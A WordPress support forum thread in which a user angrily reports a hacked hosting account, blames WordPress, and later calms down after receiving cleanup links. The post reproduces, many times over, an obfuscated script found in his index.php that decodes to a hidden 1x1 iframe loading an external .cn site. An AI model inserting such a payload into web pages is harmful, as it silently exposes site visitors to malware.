WordPress.org

Support

Support » How-To and Troubleshooting » Get your security holes fixed, damn it!

Get your security holes fixed, damn it!

  • I was running a site with wordpress only, on one domain. Everything was fine until a day ago… This was in my index.php file. Not to mention other javascript shit within other files.

    <script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

    Not to mention other files and [moronic expletive deleted]… and I didn’t do anything to get this crap. FIX THE HOLES!! I ran WordPress on another location, different domain, but my other domain was infected because I ran WordPress on another domain. The domain that’s blacklisted is “spencerpassmore.com” and I didn’t have WordPress on it, I only had images on it, for a portfolio.

    No software. The only software I had on that hosting account, was WordPress, and it was on a different domain name. And if overflowed into my other domains. Which didn’t have WordPress on at all. I had a whole separate domain name, that ran WordPress. Nothing at all, but WordPress. I couldn’t access my own control panel from the host “CPANEL”, because it was infested with [moronic expletive deleted].

    Get your holes fixed, soon. I’m old school member here, I used to be moderator here, and this is just plain [moronic expletive deleted]. Get something done today! I’m half afraid to run WP anymore, and I’m about to tell others NOT to run it. There’s obvious security hole leaks. If there wasn’t, this [moronic expletive deleted] wouldn’t be happening.

    Edit: I know, I know, change the password… I did. I will again. Still shouldn’t be a habit though. Damn software.

Viewing 3 replies - 1 through 3 (of 3 total)
  • I’m old school member here, I used to be moderator here, and this is just plain [moronic expletive deleted]. Get something done today! I’m half afraid to run WP anymore, and I’m about to tell others NOT to run it. There’s obvious security hole leaks. If there wasn’t, this [moronic expletive deleted] wouldn’t be happening.

    get a grip – you of all people should know it’s not wordpress 2.8.4 and above. If you were hacked from wordpress, it’s from an older install

    How To Completely Clean Your Hacked WordPress Installation

    How to find a backdoor in a hacked WordPress

    spencerp

    @spencerp

    Thanks Sam for the links, but it was a 2.8.4 or above version. I haven’t ran an earlier version of WordPress in years. I always ran the latest copies. 😉 But I’ve been looking more into this issue though… This has been happening with blank index.php files on domains that don’t even have any software on them. I’ll still use WordPress of course, just that night I was pissed off and drinking… the two don’t mix at all. :p Thanks again for those links…

    whooami

    @whooami

    Member

    tard 😛 (JUST kidding!!) what up homie

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Get your security holes fixed, damn it!’ is closed to new replies.
Skip to toolbar